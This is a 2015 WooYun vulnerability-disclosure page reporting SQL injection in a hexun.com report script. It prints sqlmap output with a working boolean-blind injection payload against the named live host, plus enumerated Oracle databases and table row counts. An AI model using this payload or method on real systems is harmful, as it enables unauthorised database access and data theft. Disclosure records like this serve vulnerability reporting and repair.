乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-07-09: 细节已通知厂商并且等待厂商处理中 2015-07-09: 厂商已经确认,细节仅向厂商公开 2015-07-19: 细节向核心白帽子及相关领域专家公开 2015-07-29: 细节向普通白帽子公开 2015-08-08: 细节向实习白帽子公开 2015-08-23: 细节向公众公开
请叫我安全小飞侠,谢谢!
http://baidu.hexun.com/report/ifread.php?t=1&id=617695注射参数: id URI parameter '#1*' is vulnerable. Do you want to keep testing the others (if any)? [y/N] Nsqlmap identified the following injection points with a total of 81 HTTP(s) requests:---Parameter: #1* (URI) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: http://baidu.hexun.com:80/report/ifread.php?t=1&id=617695 AND 7598=7598---[16:04:00] [INFO] testing MySQL[16:04:01] [WARNING] the back-end DBMS is not MySQL[16:04:01] [INFO] testing Oracle[16:04:01] [INFO] confirming Oracle[16:04:02] [INFO] the back-end DBMS is Oracleback-end DBMS: Oracleavailable databases [9]:[*] BDFIN[*] CTXSYS[*] EXFSYS[*] MDSYS[*] OLAPSYS[*] REPDBO[*] SYS[*] SYSTEM[*] WMSYS
+------------------------+---------+| Table | Entries |+------------------------+---------+| FUTURES_QUOTE | 26984041 || R_STOCKS_SECTOR | 3604361 || TB_HJ_TTJ | 2477437 || TB_STOCK_BOARD | 2215113 || VOTE | 2186237 || TB_SGE_QUOTE | 1463523 || TB_METAL_QUOTE | 1438797 || USA_STOCK_QUOTE_TMP | 1067821 || R_INFO_O | 1029189 || TB_STOCK_BOARD_INDEX | 865135 || R_INFO | 597134 || TB_TJS_FS | 525422 || TB_METAL_QUOTE_FX678 | 497540 || CS_TNCONT | 152035 || TB_STOCK_BOARD_MONITOR | 64100 || USA_STOCK_QUOTE | 48146 || TB_SW_HQ | 25045 || CODE_INFO | 22329 || STOCK_BOARD | 4311 || STOCK_BOARD_MONITOR | 4295 || R_STOCK | 4225 || R_INFO_2 | 3970 || TB_TJS_K | 2012 || R_SECTOR_TDX | 1986 || VOTE_MI | 925 || R_GRADE | 645 || USA_STOCK_CODE | 442 || R_INDUSTRY | 345 || CT_USERINFO | 289 || TRADINFO | 270 || CS_TNCONT_NEW | 209 || R_INSCODE | 146 || R_SECTOR | 134 || CS_TNCONF | 123 || MEMBER_STOCKS | 43 || FUTURES_CODE | 27 || AD_KB | 26 || TEST | 25 || MEMBER_STOCK_TRADE | 13 || MEMBER_STOCK_GROUPS | 11 || RP_TEST | 9 || ACCOUNT | 6 || REPORT_USER_ACCOUNT | 5 |+------------------------+---------+
你懂的,抓紧修复吧
危害等级:高
漏洞Rank:15
确认时间:2015-07-09 17:33
谢谢
暂无